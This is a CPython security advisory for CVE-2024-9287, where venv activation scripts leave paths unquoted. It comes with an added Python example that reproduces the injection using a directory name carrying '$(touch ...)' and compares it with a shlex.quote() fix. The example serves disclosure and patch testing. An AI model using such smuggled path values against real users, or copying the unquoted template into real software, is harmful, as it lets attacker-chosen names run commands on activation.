[CVE-2024-9287] Virtual environment (venv) activation scripts don't quote paths
Oct. 22, 2024, 4:33 p.m.
There is a MEDIUM severity vulnerability affecting CPython.
A vulnerability has been found in the CPython venv module and CLI: path names
supplied when creating a virtual environment were not quoted properly when
substituted into the virtual environment "activation" scripts (i.e. the files
run by "source venv/bin/activate"), allowing whoever chooses the environment's
path to inject commands into those scripts. This means that an
attacker-controlled virtual environment can run commands when it is activated.
Because the activation scripts are written once, at creation time, the injected
text persists in an existing environment until that environment is recreated
with a fixed interpreter. Virtual environments that were not created by an
attacker, or that are used without being activated (e.g. by running
"./venv/bin/python" directly), are not affected.
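The mechanism described above, as an added example that is not part of this advisory or of CPython's own code. The two templates are deliberately minimal stand-ins for the POSIX activate script (an assumption about its shape, not a copy of it): the unsafe one pastes the path into a double-quoted string, which does not stop $(...), backticks or an embedded double quote; the hardened one leaves the slot bare and fills it with shlex.quote(), which yields a single-quoted literal the shell never interprets. demo() sources both renderings under /bin/sh with a constructed directory name carrying a `$(touch ...)` payload; probe_installed_python() then builds a real environment with the stdlib venv module under such a name and sources its bin/activate, so you can check whether the interpreter you have in hand still injects. The example needs a POSIX sh and assumes the mkdtemp() directory contains no shell metacharacters.

```python
"""Reproduce the unquoted-path pattern behind CVE-2024-9287 and probe the
installed interpreter. Added example; the templates are stand-ins, not
CPython's activate script."""
from __future__ import annotations

import os
import shlex
import subprocess
import tempfile
import venv
from pathlib import Path

# Unsafe pattern (assumed shape): the path is pasted inside a double-quoted
# string. Double quotes do not neutralise $(...), backticks or an embedded '"',
# so an attacker-chosen directory name becomes shell code when sourced.
UNSAFE_TEMPLATE = 'VIRTUAL_ENV="__VENV_DIR__"\nexport VIRTUAL_ENV\n'
# Hardened pattern: the slot is bare and the generator fills it with
# shlex.quote(), producing a single-quoted literal.
SAFE_TEMPLATE = 'VIRTUAL_ENV=__VENV_DIR__\nexport VIRTUAL_ENV\n'


def render_unsafe(env_dir: str) -> str:
    return UNSAFE_TEMPLATE.replace("__VENV_DIR__", env_dir)


def render_safe(env_dir: str) -> str:
    return SAFE_TEMPLATE.replace("__VENV_DIR__", shlex.quote(env_dir))


def source_and_report(script_text: str, marker: Path) -> tuple[bool, str]:
    """Source script_text in /bin/sh; return (marker file created?, $VIRTUAL_ENV)."""
    marker.unlink(missing_ok=True)
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as fh:
        fh.write(script_text)
        script_path = fh.name
    try:
        cmd = f'. {shlex.quote(script_path)} && printf %s "$VIRTUAL_ENV"'
        proc = subprocess.run(["sh", "-c", cmd], capture_output=True,
                              text=True, check=True)
    finally:
        os.unlink(script_path)
    return marker.exists(), proc.stdout


def demo(workdir: str | None = None) -> dict:
    """Activate both renderings of an attacker-named venv and report what ran."""
    workdir = workdir or tempfile.mkdtemp()  # assumed free of shell metacharacters
    marker = Path(workdir) / "pwned"
    # Constructed attacker-chosen directory name; `touch` stands in for any payload.
    evil_dir = f"{workdir}/venv$(touch {marker})"
    unsafe_hit, unsafe_env = source_and_report(render_unsafe(evil_dir), marker)
    safe_hit, safe_env = source_and_report(render_safe(evil_dir), marker)
    return {
        "workdir": workdir,
        "unsafe_executed": unsafe_hit,  # True: payload ran and vanished from the path
        "unsafe_env": unsafe_env,
        "safe_executed": safe_hit,      # False: path stored verbatim, nothing executed
        "safe_env": safe_env,
    }


def probe_installed_python(workdir: str | None = None) -> bool | None:
    """Build a real venv with the stdlib module under a metacharacter name and
    source its bin/activate. True = this interpreter still injects, False = it
    quotes the path, None = the venv could not be built or sourced here."""
    workdir = workdir or tempfile.mkdtemp()
    marker = Path(workdir) / "probe-pwned"
    env_dir = f"{workdir}/probe$(touch {marker})"
    try:
        venv.create(env_dir, symlinks=True, with_pip=False)
        activate = Path(env_dir, "bin", "activate").read_text()
        hit, _ = source_and_report(activate, marker)
    except (OSError, subprocess.CalledProcessError):
        return None
    return hit


if __name__ == "__main__":
    print(demo())
    print("installed venv module injects:", probe_installed_python())
```

In the unsafe rendering the marker file appears and `$VIRTUAL_ENV` ends as `<workdir>/venv`, because the shell evaluated and discarded the substitution; in the hardened rendering no file appears and the variable holds the name verbatim. A `True` from probe_installed_python() means the interpreter that built the environment is unpatched and any environment it created from an untrusted path should be recreated after updating.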
Please see the linked CVE ID for the latest information on affected versions:
Posted by Seth Larson